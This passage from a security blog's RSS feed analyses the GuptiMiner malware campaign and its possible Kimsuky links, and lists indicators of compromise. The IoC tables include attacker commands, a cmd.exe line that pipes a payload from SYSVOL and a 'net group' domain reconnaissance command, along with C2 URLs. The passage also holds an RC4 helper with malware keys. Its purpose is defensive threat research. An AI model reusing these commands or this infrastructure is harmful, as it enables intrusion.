  1506. <figure class="wp-block-table"><table><tbody><tr><td><strong>Stolen certificate SHA1</strong>&nbsp;</td><td><strong>Signed GuptiMiner sample</strong>&nbsp;</td></tr><tr><td>529763AC53562BE3C1BB2C42BCAB51E3AD8F8A56&nbsp;</td><td>31dfba1b102bbf4092b25e63aae0f27386c480c10191c96c04295cb284f20878&nbsp;</td></tr><tr><td>529763AC53562BE3C1BB2C42BCAB51E3AD8F8A56&nbsp;</td><td>8e96d15864ec0cc6d3976d87e9e76e6eeccc23c551b22dcfacb60232773ec049&nbsp;</td></tr><tr><td>31070C2EA30E6B4E1C270DF94BE1036AE7F8616B&nbsp;</td><td>b0f94d84888dffacbc10bd7f9983b2d681b55d7e932c2d952d47ee606058df54&nbsp;</td></tr><tr><td>31070C2EA30E6B4E1C270DF94BE1036AE7F8616B&nbsp;</td><td>f656a418fca7c4275f2441840faaeb70947e4f39d3826d6d2e50a3e7b8120e4e&nbsp;</td></tr></tbody></table></figure>
  1507.  
  1508.  
  1509.  
  1510. <h3 class="wp-block-heading">Possible Ties to Kimsuky&nbsp;</h3>
  1511.  
  1512.  
  1513.  
  1514. <p><code><em>7f1221c613b9de2da62da613b8b7c9afde2ea026fe6b88198a65c9485ded7b3d</em><br><em>(2021-03-06 20:13:32 UTC)</em>&nbsp;</code></p>
  1515.  
  1516.  
  1517.  
  1518. <p>During our research, we also found an information stealer whose PDB path closely resembles those used across the whole GuptiMiner campaign (<code>MainWork</code>):<br><code>F:\!PROTECT\Real\startW-2008\MainWork\Release\MainWork.pdb</code></p>
  1519.  
  1520.  
  1521.  
  1522. <p>However, we have not seen it distributed by GuptiMiner and, according to our data, it does not belong to the same operation or infection chain. The malware performs typical stealing activities, such as capturing every keystroke, harvesting HTML forms from open browser tabs and recording when programs are opened, and stores the results in log files.</p>
  1523.  
  1524.  
  1525.  
  1526. <p>What is truly interesting, however, is that this information stealer may originate from Kimsuky operations. Kimsuky, also known as Black Banshee among other aliases, is a North Korean state-backed APT group.</p>
  1527.  
  1528.  
  1529.  
  1530. <p>It uses a similar approach of searching for AhnLab’s real-time detection window by its class name <code>49B46336-BA4D-4905-9824-D282F05F6576</code>, as described by both <a href="https://asec.ahnlab.com/en/31089/" target="_blank" rel="noreferrer noopener">AhnLab</a> and <a href="https://blog.talosintelligence.com/kimsuky-abuses-blogs-delivers-malware/" target="_blank" rel="noreferrer noopener">Cisco Talos Intelligence</a> in the <em>Information-gathering module</em> section of their write-up. If such a window is found, it is terminated or hidden from the infected user’s view.</p>
  1531.  
  1532.  
  1533. <div class="wp-block-image">
  1534. <figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-55.png"><img loading="lazy" decoding="async" width="1024" height="410" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-55-1024x410.png" alt="" class="wp-image-8477" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-55-1024x410.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-55-300x120.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-55-768x308.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-55.png 1338w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><figcaption class="wp-element-caption"><em>Function that searches and terminates AhnLab’s real-time detection window class</em></figcaption></figure></div>
  1535.  
  1536.  
  1537. <p>Furthermore, the stealer contains an encrypted payload in its resources with the hash <code>d5bc6cf988c6d3c60e71195d8a5c2f7525f633bb54059688ad8cfa1d4b72aa6c (<em>2021-02-19 15:00:47 UTC</em>)</code> and the PDB path:<br><code>F:\PROTECT\Real\startW-2008\HTTPPro\Release\HTTPPro.pdb</code></p>
  1538.  
  1539.  
  1540.  
  1541. <p>This module is decrypted using the standard RC4 algorithm with the key <code>messi.com</code> and is used for downloading additional stages. The URLs used include:<br><code>http://stwu.mygamesonline[.]org/home/sel.php</code><br><code>http://stwu.mygamesonline[.]org/home/buy.php?filename=%s&amp;key=%s</code></p>
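<p>RC4 appears three times in this analysis: the modular backdoor decrypts its configuration and network module with it, <code>notepad.exe</code> unpacks <code>ms00.dat</code> with the key <code>V#@!1vw32</code>, and the Kimsuky stealer decrypts its <code>HTTPPro</code> resource with <code>messi.com</code>. The Python below is our own helper for unpacking such dumped blobs, added here and not taken from any of the samples; the two keys are the ones quoted above, while the PE sanity check and the file wrapper are ours.</p>

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling, then XOR the PRGA keystream over data.
    The same call encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    S = list(range(256))
    j = 0
    for i in range(256):                       # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Keys quoted in the analysis.
KEY_MS00_DAT = b"V#@!1vw32"   # notepad.exe -> ms00.dat (7z SFX dropper)
KEY_HTTPPRO = b"messi.com"    # Kimsuky stealer resource -> HTTPPro module


def looks_like_pe(blob: bytes) -> bool:
    """Cheap sanity check on a decrypted blob: MZ stub and PE\\0\\0 at e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def decrypt_blob(blob: bytes, key: bytes) -> tuple:
    """Decrypt an extracted blob and report whether the result is a PE image."""
    plain = rc4(key, blob)
    return plain, looks_like_pe(plain)


def decrypt_file(path: str, key: bytes, out_path: str) -> bool:
    """Decrypt a dumped file on disk (e.g. ms00.dat) and write the plaintext."""
    with open(path, "rb") as f:
        plain, is_pe = decrypt_blob(f.read(), key)
    with open(out_path, "wb") as f:
        f.write(plain)
    return is_pe
```

<p>The <code>looks_like_pe()</code> result is the quickest way to tell a correct key from a wrong one when trying the keys above against a dumped resource: with the wrong key the output is noise and the MZ/PE markers will not line up.</p>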
  1542.  
  1543.  
  1544.  
  1545. <p>The domain <code>mygamesonline[.]org</code> is commonly used by Kimsuky, with a variety of subdomains.</p>
  1546.  
  1547.  
  1548.  
  1549. <p>The keylogger also downloads a next stage called <code>ms12.acm</code>:</p>
  1550.  
  1551.  
  1552. <div class="wp-block-image">
  1553. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-56.png"><img loading="lazy" decoding="async" width="467" height="169" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-56.png" alt="" class="wp-image-8478" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-56.png 467w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-56-300x109.png 300w" sizes="(max-width: 467px) 100vw, 467px" /></a><figcaption class="wp-element-caption"><em>The next stage is downloaded with a name <code>ms12.acm</code></em></figcaption></figure></div>
  1554.  
  1555.  
  1556. <p>This suggests a possible naming-convention pattern linking the stealer to the Modular Backdoor: as described in the <a href="#other-infection-vectors-modular-backdoor">Other Infection Vectors</a> section, the 7z SFX archive contains an encrypted file called <code>ms00.dat</code>, and the resemblance is hard to ignore.</p>
  1557.  
  1558.  
  1559.  
  1560. <p>Last but not least, another strong indicator for a possible attribution is that the Kimsuky keylogger sample <code>dddc57299857e6ecb2b80cbab2ae6f1978e89c4bfe664c7607129b0fc8db8b1f</code>, mentioned in the same Talos blog post, contains a section called <code>.vlizer</code>, as seen below:</p>
  1561.  
  1562.  
  1563. <div class="wp-block-image">
  1564. <figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-57.png"><img loading="lazy" decoding="async" width="1024" height="269" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-57-1024x269.png" alt="" class="wp-image-8479" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-57-1024x269.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-57-300x79.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-57-768x202.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-57.png 1277w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><figcaption class="wp-element-caption"><em>Kimsuky keylogger sections</em></figcaption></figure></div>
  1565.  
  1566.  
  1567. <p>During the GuptiMiner installation process (<a href="#installation-process">Stage 0</a>), we described how the threat actors introduced <a href="#code-virtualization">Code Virtualization</a> in 2018, using a dedicated section called <code>.v_lizer</code>.</p>
  1568.  
  1569.  
  1570.  
  1571. <h2 class="wp-block-heading">Conclusion&nbsp;</h2>
  1572.  
  1573.  
  1574.  
  1575. <p>In this analysis, we described in detail our findings regarding a long-standing threat we call GuptiMiner. This sophisticated operation has been performing MitM attacks against the update mechanism of the eScan antivirus. We disclosed the security vulnerability to both eScan and the India CERT and received confirmation from eScan on 2023-07-31 that the issue had been fixed and successfully resolved.</p>
  1576.  
  1577.  
  1578.  
  1579. <p>Over the course of the GuptiMiner operation, the attackers deployed a long chain of stages and functionalities, including DNS requests to the attacker’s own DNS servers, sideloading, extracting payloads from innocent-looking images and signing payloads with a custom trusted root anchor certification authority, among others.</p>
  1580.  
  1581.  
  1582.  
  1583. <p>Two different types of backdoors were discovered, both targeting large corporate networks. The first performs SMB scanning of the local network, enabling lateral movement to potentially exploit vulnerable Windows 7 and Windows Server 2008 systems. The second is multi-modular, accepting commands in the background to install further modules, and focuses on stealing stored private keys and cryptocurrency wallets.</p>
  1584.  
  1585.  
  1586.  
  1587. <p>Interestingly, the final payload distributed by GuptiMiner was also XMRig, which is somewhat unexpected for such a carefully thought-through operation.</p>
  1588.  
  1589.  
  1590.  
  1591. <p>We also found possible ties to Kimsuky, a notorious North Korean APT group, based on similarities between a Kimsuky keylogger and fragments discovered during the analysis of the GuptiMiner operation.</p>
  1592.  
  1593.  
  1594.  
  1595. <h2 class="wp-block-heading">eScan follow-up</h2>
  1596.  
  1597.  
  1598.  
  1599. <p>We shared our findings and research with eScan prior to publishing this analysis. For the sake of completeness, we include their statement on the topic:</p>
  1600.  
  1601.  
  1602.  
  1603. <p><em>“I would also like to highlight some key points:</em><br><em>1. Our records indicate that the last similar report was received towards the end of the year 2019.</em><br><em>2. Since 2020, we have implemented a stringent checking mechanism that utilizes EV Signing to ensure that non-signed binaries are rejected.</em><br><em>3. Multiple heuristic rules have been integrated into our solution to detect and block any instances of legitimate processes being used for mining, including the forking of unsigned binaries.</em><br><em>4. While our internal investigations did not uncover instances of the XRig miner, it is possible that this may be due to geo-location factors.</em><br><em>5. Our latest solution versions employ secure (https) downloads, ensuring encrypted communication when clients interact with our cloud-facing servers for update downloads.”</em></p>
  1604.  
  1605.  
  1606.  
  1607. <p>According to our telemetry, we continue to observe new infections and GuptiMiner builds within our user base. This may be attributable to eScan clients on these devices not being updated properly.</p>
  1608.  
  1609.  
  1610.  
  1611. <h2 class="wp-block-heading" id="ioc">Indicators of Compromise (IoCs)</h2>
  1612.  
  1613.  
  1614.  
  1615. <p>In this section, we summarize the Indicators of Compromise mentioned in this analysis. Since they are indicators, the listed files and domains are not automatically malicious on their own.</p>
  1616.  
  1617.  
  1618.  
  1619. <p>For a more detailed list of IoCs for the whole GuptiMiner campaign, please visit our <a href="https://github.com/avast/ioc/tree/master/GuptiMiner" target="_blank" rel="noreferrer noopener">GitHub</a>.</p>
  1620.  
  1621.  
  1622.  
  1623. <h3 class="wp-block-heading">Evolution and Timelines&nbsp;</h3>
  1624.  
  1625.  
  1626.  
  1627. <h4 class="wp-block-heading">Domains&nbsp;</h4>
  1628.  
  1629.  
  1630.  
  1631. <figure class="wp-block-table"><table><tbody><tr><td><strong>Domain</strong></td></tr><tr><td>_spf.microsoft[.]com</td></tr><tr><td>acmeautoleasing[.]net</td></tr><tr><td>b.guterman[.]net</td></tr><tr><td>breedbackfp[.]com</td></tr><tr><td>crl.microsoft[.]com</td></tr><tr><td>crl.peepzo[.]com</td></tr><tr><td>crl.sneakerhost[.]com</td></tr><tr><td>desmoinesreg[.]com</td></tr><tr><td>dl.sneakerhost[.]com</td></tr><tr><td>edgesync[.]net</td></tr><tr><td>espcomp[.]net</td></tr><tr><td>ext.microsoft[.]com</td></tr><tr><td>ext.peepzo[.]com</td></tr><tr><td>ext.sneakerhost[.]com</td></tr><tr><td>gesucht[.]net</td></tr><tr><td>globalsign.microsoft[.]com</td></tr><tr><td>icamper[.]net</td></tr><tr><td>m.airequipment[.]net</td></tr><tr><td>m.cbacontrols[.]com</td></tr><tr><td>m.gosoengine[.]com</td></tr><tr><td>m.guterman[.]net</td></tr><tr><td>m.indpendant[.]com</td></tr><tr><td>m.insomniaccinema[.]com</td></tr><tr><td>m.korkyt[.]net</td></tr><tr><td>m.satchmos[.]net</td></tr><tr><td>m.sifraco[.]com</td></tr><tr><td>ns.bretzger[.]net</td></tr><tr><td>ns.deannacraite[.]com</td></tr><tr><td>ns.desmoinesreg[.]com</td></tr><tr><td>ns.dreamsoles[.]com</td></tr><tr><td>ns.editaccess[.]com</td></tr><tr><td>ns.encontacto[.]net</td></tr><tr><td>ns.gravelmart[.]net</td></tr><tr><td>ns.gridsense[.]net</td></tr><tr><td>ns.jetmediauk[.]com</td></tr><tr><td>ns.kbdn[.]net</td></tr><tr><td>ns.lesagencestv[.]net</td></tr><tr><td>ns.penawarkanser[.]net</td></tr><tr><td>ns.srnmicro[.]net</td></tr><tr><td>ns.suechiLton[.]com</td></tr><tr><td>ns.trafomo[.]com</td></tr><tr><td>ns1.earthscienceclass[.]com</td></tr><tr><td>ns1.peepzo[.]com</td></tr><tr><td>ns1.securtelecom[.]com</td></tr><tr><td>ns1.sneakerhost[.]com</td></tr><tr><td>p.bramco[.]net</td></tr><tr><td>p.hashvault[.]pro</td></tr><tr><td>r.sifraco[.]com</td></tr><tr><td>spf.microsoft[.]com</td></tr><tr><td>widgeonhill[.]com</td></tr><tr><td>www.bascap[.]net</td></tr></tbody></table></figure>
  1632.  
  1633.  
  1634.  
  1635. <h4 class="wp-block-heading">Mutexes&nbsp;</h4>
  1636.  
  1637.  
  1638.  
  1639. <figure class="wp-block-table"><table><tbody><tr><td><strong>Mutex</strong>&nbsp;</td></tr><tr><td>ESOCESS_&nbsp;</td></tr><tr><td>Global\Fri Aug 13 02:17:49 2021&nbsp;</td></tr><tr><td>Global\Fri Aug 13 02:22:55 2021&nbsp;</td></tr><tr><td>Global\Mon Apr 19 06:03:17 2021&nbsp;</td></tr><tr><td>Global\Mon Apr 24 07:19:54 2023&nbsp;</td></tr><tr><td>Global\Mon Feb 27 08:11:25 2023&nbsp;</td></tr><tr><td>Global\Mon Jun 14 03:22:57 2021&nbsp;</td></tr><tr><td>Global\Mon Mar 13 07:29:11 2023&nbsp;</td></tr><tr><td>Global\Mon Mar 22 09:16:00 2021&nbsp;</td></tr><tr><td>Global\Sun Jun 13 08:22:07 2021&nbsp;</td></tr><tr><td>Global\Thu Aug 10 03:25:11 2023&nbsp;</td></tr><tr><td>Global\Thu Aug 12 02:07:58 2021&nbsp;</td></tr><tr><td>Global\Thu Feb 23 08:37:09 2023&nbsp;</td></tr><tr><td>Global\Thu Mar 25 02:03:14 2021&nbsp;</td></tr><tr><td>Global\Thu Mar 25 09:31:19 2021&nbsp;</td></tr><tr><td>Global\Thu Nov&nbsp; 2 08:21:56 2023&nbsp;</td></tr><tr><td>Global\Thu Nov&nbsp; 9 06:19:40 2023&nbsp;</td></tr><tr><td>Global\Tue Apr 25 08:32:05 2023&nbsp;</td></tr><tr><td>Global\Tue Mar 23 02:37:32 2021&nbsp;</td></tr><tr><td>Global\Tue Oct 10 08:07:11 2023&nbsp;</td></tr><tr><td>Global\Wed Aug 11 09:16:37 2021&nbsp;</td></tr><tr><td>Global\Wed Jan&nbsp; 5 09:15:56 2022&nbsp;</td></tr><tr><td>Global\Wed Jun&nbsp; 2 09:43:03 2021&nbsp;</td></tr><tr><td>Global\Wed Mar&nbsp; 1 01:29:48 2023&nbsp;</td></tr><tr><td>Global\Wed Mar 23 08:56:01 2022&nbsp;</td></tr><tr><td>Global\Wed Mar 23 09:06:36 2022&nbsp;</td></tr><tr><td>Global\Wed May 10 06:38:46 2023&nbsp;</td></tr><tr><td>Global1&nbsp;</td></tr><tr><td>GlobalMIVOD_V4&nbsp;</td></tr><tr><td>GMCM1&nbsp;</td></tr><tr><td>MIVOD_6&nbsp;</td></tr><tr><td>MTX_EX01&nbsp;</td></tr><tr><td>Mutex_ONLY_ME_V1&nbsp;</td></tr><tr><td>Mutex_ONLY_ME_V2&nbsp;</td></tr><tr><td>Mutex_ONLY_ME_V3&nbsp;</td></tr><tr><td>PROCESS_&nbsp;</td></tr><tr><td>SLDV014&nbsp;</td></tr><tr><td>SLDV02&nbsp;</td></tr><tr><td>SLDV024&nbsp;</td></tr><tr><td>SLDV04&nbsp;</td></tr><tr><td>SLDV10&nbsp;</td></tr><tr><td>SLDV11&nbsp;</td></tr><tr><td>SLDV13&nbsp;</td></tr><tr><td>SLDV15&nbsp;</td></tr><tr><td>SLDV17&nbsp;</td></tr><tr><td>SLDV22&nbsp;</td></tr><tr><td>SLDV26&nbsp;</td></tr></tbody></table></figure>
  1640.  
  1641.  
  1642.  
  1643. <h4 class="wp-block-heading">PDB paths&nbsp;</h4>
  1644.  
  1645.  
  1646.  
  1647. <figure class="wp-block-table"><table><tbody><tr><td><strong>PDB path</strong></td></tr><tr><td>E:\projects\projects\RunCompressedSC\x64\Release\RunCompressedSC.pdb</td></tr><tr><td>E:\Projects\putty-src\windows\VS2012\x64\Release\plink.pdb</td></tr><tr><td>F:\CODE-20221019\Projects\RunCompressedSC\x64\Release\RunCompressedSC.pdb</td></tr><tr><td>F:\Pro\MainWork\Release\MainWork.pdb</td></tr><tr><td>F:\Pro\MainWork\x64\Release\MainWork.pdb</td></tr><tr><td>F:\Projects\2020-NEW\20200307-NEW\MainWork-VS2017-IPHLPAPI\Release\MainWork.pdb</td></tr><tr><td>F:\Projects\2020-NEW\20200307-NEW\MainWork-VS2017-IPHLPAPI\x64\Release\MainWork.pdb</td></tr><tr><td>F:\Projects\2020-NEW\20200307-NEW\MainWork-VS2017-nvhelper\Release\MainWork.pdb</td></tr><tr><td>F:\Projects\2020-NEW\20200307-NEW\MainWork-VS2017-nvhelper\x64\Release\MainWork.pdb</td></tr><tr><td>F:\Projects\RunCompressedSC\x64\Release\RunCompressedSC.pdb</td></tr><tr><td>F:\V202102\MainWork-VS2017 – Monitor\Release\MainWork.pdb</td></tr><tr><td>F:\V202102\MainWork-VS2017 – Monitor\x64\Release\MainWork.pdb</td></tr><tr><td>H:\projects\MainWork\Release\MainWork.pdb</td></tr></tbody></table></figure>
  1648.  
  1649.  
  1650.  
  1651. <h3 class="wp-block-heading">Stage 0 – Installation Process&nbsp;</h3>
  1652.  
  1653.  
  1654.  
  1655. <figure class="wp-block-table"><table><tbody><tr><td><strong>IoC</strong>&nbsp;</td><td><strong>Note</strong>&nbsp;</td></tr><tr><td>http://update3[.]mwti[.]net/pub/update/updll3.dlz&nbsp;</td><td>&nbsp;</td></tr><tr><td>c3122448ae3b21ac2431d8fd523451ff25de7f6e399ff013d6fa6953a7998fa3&nbsp;</td><td>C:\Program Files\eScan\VERSION.DLL&nbsp;</td></tr><tr><td>7a1554fe1c504786402d97edecc10c3aa12bd6b7b7b101cfc7a009ae88dd99c6&nbsp;</td><td>updll65.dlz&nbsp;</td></tr></tbody></table></figure>
  1656.  
  1657.  
  1658.  
  1659. <h3 class="wp-block-heading">Stage 0.9 – Installation Improvements&nbsp;</h3>
  1660.  
  1661.  
  1662.  
  1663. <h3 class="wp-block-heading">Stage 1 – PNG Loader&nbsp;</h3>
  1664.  
  1665.  
  1666.  
  1667. <figure class="wp-block-table"><table><tbody><tr><td><strong>IoC</strong>&nbsp;</td><td><strong>Note</strong>&nbsp;</td></tr><tr><td>ff884d4c01fccf08a916f1e7168080a2d740a62a774f18e64f377d23923b0297&nbsp;</td><td>&nbsp;</td></tr><tr><td>ext.peepzo[.]com&nbsp;</td><td>&nbsp;</td></tr><tr><td>crl.peepzo[.]com&nbsp;</td><td>&nbsp;</td></tr><tr><td>ns1.peepzo[.]com&nbsp;</td><td>&nbsp;</td></tr><tr><td>http://www.deanmiller[.]net/m/&nbsp;</td><td>&nbsp;</td></tr><tr><td>294b73d38b89ce66cfdefa04b1678edf1b74a9b7f50343d9036a5d549ade509a&nbsp;</td><td>&nbsp;</td></tr><tr><td>185.45.192[.]43/elimp/&nbsp;</td><td>&nbsp;</td></tr><tr><td>6305d66aac77098107e3aa6d85af1c2e3fc2bb1f639e4a9da619c8409104c414</td><td></td></tr><tr><td>SYSTEM\CurrentControlSet\Control\Arbiters\Class&nbsp;</td><td>Registry&nbsp;</td></tr><tr><td>SYSTEM\CurrentControlSet\Control\CMF\Class&nbsp;</td><td>Registry&nbsp;</td></tr><tr><td>SYSTEM\CurrentControlSet\Control\CMF\CORE&nbsp;</td><td>Registry&nbsp;</td></tr><tr><td>SYSTEM\CurrentControlSet\Control\CMF\DEF&nbsp;</td><td>Registry&nbsp;</td></tr><tr><td>SYSTEM\CurrentControlSet\Control\CMF\Els&nbsp;</td><td>Registry&nbsp;</td></tr><tr><td>SYSTEM\CurrentControlSet\Control\CMF\ASN&nbsp;</td><td>Registry&nbsp;</td></tr><tr><td>SYSTEM\CurrentControlSet\Control\MSDTC\BSR&nbsp;</td><td>Registry&nbsp;</td></tr></tbody></table></figure>
  1668.  
  1669.  
  1670.  
  1671. <h3 class="wp-block-heading">Stage 2 – Gzip Loader&nbsp;</h3>
  1672.  
  1673.  
  1674.  
  1675. <figure class="wp-block-table"><table><tbody><tr><td><strong>IoC</strong>&nbsp;</td><td><strong>Note</strong>&nbsp;</td></tr><tr><td>357009a70daacfc3379560286a134b89e1874ab930d84edb2d3ba418f7ad6a0b&nbsp;</td><td>&nbsp;</td></tr></tbody></table></figure>
  1676.  
  1677.  
  1678.  
  1679. <h3 class="wp-block-heading">Stage 3 – Puppeteer&nbsp;</h3>
  1680.  
  1681.  
  1682.  
  1683. <figure class="wp-block-table"><table><tbody><tr><td><strong>Ioc</strong>&nbsp;</td><td><strong>Note</strong>&nbsp;</td></tr><tr><td>364984e8d62eb42fd880755a296bd4a93cc071b9705c1f1b43e4c19dd84adc65&nbsp;</td><td>&nbsp;</td></tr><tr><td>C:\ProgramData\Microsoft\Crypto\Escan\dss.exe&nbsp;</td><td>&nbsp;</td></tr><tr><td>C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll3&nbsp;&nbsp;</td><td>&nbsp;</td></tr><tr><td>C:\Windows\system32\tasks\Microsoft\windows\autochk\ESUpgrade&nbsp;</td><td>Scheduled task&nbsp;</td></tr><tr><td>HKEY_LOCAL_MACHINE\SOFTWARE\AVC3&nbsp;</td><td>Registry&nbsp;</td></tr><tr><td>\Device\HarddiskVolume1\Program Files (x86)\eScan\download.exe&nbsp;</td><td>&nbsp;</td></tr><tr><td>4dfd082eee771b7801b2ddcea9680457f76d4888c64bb0b45d4ea616f0a47f21&nbsp;</td><td>&nbsp;</td></tr><tr><td>SOFTWARE\Microsoft\Windows NT\CurrentVersion\DNS Server&nbsp;</td><td>Registry&nbsp;</td></tr><tr><td>net group ”domain computers” /domain&nbsp;</td><td>Command&nbsp;</td></tr><tr><td>https://m.airequipment[.]net/gpse/&nbsp;</td><td>&nbsp;</td></tr><tr><td>487624b44b43dacb45fd93d03e25c9f6d919eaa6f01e365bb71897a385919ddd&nbsp;</td><td>&nbsp;</td></tr><tr><td>C:\Program Files (x86)\eScan\updll3.dll3&nbsp;</td><td>&nbsp;</td></tr><tr><td>C:\Program Files\Common Files\SYSTEM\SysResetErr\SysResetErr.DLL&nbsp;</td><td>&nbsp;</td></tr><tr><td>C:\Program Files\Microsoft SQL Server\SpellChecking\MsSpellChecking.DLL&nbsp;</td><td>&nbsp;</td></tr><tr><td>C:\Program Files\Microsoft SQL 
Server\SpellChecking\MsSpellCheckingHost.DLL&nbsp;</td><td>&nbsp;</td></tr><tr><td>C:\ProgramData\AMD\CNext\atiadlxx.dll&nbsp;</td><td>&nbsp;</td></tr><tr><td>C:\ProgramData\Microsoft\Assistance\LunarG\vulkan-1.dll&nbsp;</td><td>&nbsp;</td></tr><tr><td>C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll&nbsp;</td><td>&nbsp;</td></tr><tr><td>C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll3&nbsp;</td><td>&nbsp;</td></tr><tr><td>C:\ProgramData\Microsoft\Network\Escan\AutoWake.dll&nbsp;</td><td>&nbsp;</td></tr><tr><td>1c31d06cbdf961867ec788288b74bee0db7f07a75ae06d45d30355c0bc7b09fe&nbsp;</td><td>&nbsp;</td></tr><tr><td>1fbc562b08637a111464ba182cd22b1286a185f7cfba143505b99b07313c97a4&nbsp;</td><td>&nbsp;</td></tr></tbody></table></figure>
  1684.  
  1685.  
  1686.  
  1687. <h3 class="wp-block-heading">Stage 4 – Backdoor&nbsp;</h3>
  1688.  
  1689.  
  1690.  
  1691. <figure class="wp-block-table"><table><tbody><tr><td><strong>IoC</strong>&nbsp;</td><td><strong>Note</strong>&nbsp;</td></tr><tr><td>07beca60c0a50520b8dbc0b8cc2d56614dd48fef0466f846a0a03afbfc42349d&nbsp;</td><td>&nbsp;</td></tr><tr><td>E:\Projects\putty-src\windows\VS2012\x64\Release\plink.pdb&nbsp;</td><td>PDB&nbsp;</td></tr><tr><td>HKEY_LOCAL_MACHINE \SYSTEM\CurrentControlSet\Control\CMF\Class&nbsp;</td><td>Registry&nbsp;</td></tr><tr><td>HKEY_LOCAL_MACHINE\SYSTEM\RNG\FFFF&nbsp;&nbsp;</td><td>Registry&nbsp;</td></tr><tr><td>gesucht[.]net&nbsp;</td><td>&nbsp;</td></tr><tr><td>f0ccfcb5d49d08e9e66b67bb3fedc476fdf5476a432306e78ddaaba4f8e3bbc4&nbsp;</td><td>&nbsp;</td></tr><tr><td>HKEY_LOCAL_MACHINE\SYSTEM\Software\Microsoft\DECLAG&nbsp;</td><td>Registry&nbsp;</td></tr><tr><td>8446d4fc1310b31238f9a610cd25ea832925a25e758b9a41eea66f998163bb34&nbsp;</td><td>Shellcode&nbsp;</td></tr><tr><td>74D7F1AF69FB706E87FF0116B8E4FA3A9B87275505E2EE7A32A8628A2D066549&nbsp;</td><td>&nbsp;</td></tr><tr><td>www.righttrak[.]net:443&nbsp;&nbsp;</td><td>&nbsp;</td></tr><tr><td>185.248.160[.]141&nbsp;</td><td>&nbsp;</td></tr><tr><td>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCB&nbsp;</td><td>Registry&nbsp;</td></tr><tr><td>af9f1331ac671d241bf62240aa52389059b4071a0635cb9cb58fa78ab942a33b&nbsp;</td><td>&nbsp;</td></tr></tbody></table></figure>
  1692.  
  1693.  
  1694.  
  1695. <h3 class="wp-block-heading">Related and Future Research&nbsp;</h3>
  1696.  
  1697.  
  1698.  
  1699. <figure class="wp-block-table"><table><tbody><tr><td><strong>IoC</strong>&nbsp;</td><td><strong>Note</strong>&nbsp;</td></tr><tr><td>&#8220;cmd.exe&#8221; /c type &#8220;\&lt;domain&gt;\SYSVOL\&lt;domain&gt;\scripts\gpon.inc&#8221; | &#8220;\&lt;domain&gt;\SYSVOL\&lt;domain&gt;\scripts\powAMD64.dat&#8221; -nop &#8211;&nbsp;</td><td>Command&nbsp;</td></tr><tr><td>C:\Windows\System32\Tasks\ScheduledDefrag&nbsp;</td><td>Scheduled task&nbsp;</td></tr><tr><td>529763AC53562BE3C1BB2C42BCAB51E3AD8F8A56&nbsp;</td><td>Certificate SHA1&nbsp;</td></tr><tr><td>31070C2EA30E6B4E1C270DF94BE1036AE7F8616B&nbsp;</td><td>Certificate SHA1&nbsp;</td></tr><tr><td>31dfba1b102bbf4092b25e63aae0f27386c480c10191c96c04295cb284f20878&nbsp;</td><td>&nbsp;</td></tr><tr><td>8e96d15864ec0cc6d3976d87e9e76e6eeccc23c551b22dcfacb60232773ec049&nbsp;</td><td>&nbsp;</td></tr><tr><td>b0f94d84888dffacbc10bd7f9983b2d681b55d7e932c2d952d47ee606058df54&nbsp;</td><td>&nbsp;</td></tr><tr><td>f656a418fca7c4275f2441840faaeb70947e4f39d3826d6d2e50a3e7b8120e4e&nbsp;</td><td>&nbsp;</td></tr><tr><td>7f1221c613b9de2da62da613b8b7c9afde2ea026fe6b88198a65c9485ded7b3d&nbsp;</td><td>&nbsp;</td></tr><tr><td>F:\!PROTECT\Real\startW-2008\MainWork\Release\MainWork.pdb&nbsp;</td><td>PDB&nbsp;</td></tr></tbody></table></figure>
  1701. ]]></content:encoded>
  1702. </item>
  1703. <item>
  1704. <title>From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams</title>
  1705. <link>https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams</link>
  1706. <dc:creator><![CDATA[Luigino Camastra]]></dc:creator>
  1707. <pubDate>Thu, 18 Apr 2024 06:30:00 +0000</pubDate>
  1708. <category><![CDATA[PC]]></category>
  1709. <category><![CDATA[Uncategorized]]></category>
  1710. <category><![CDATA[APT]]></category>
  1711. <category><![CDATA[Lazarus]]></category>
  1712. <category><![CDATA[Recruiting scams]]></category>
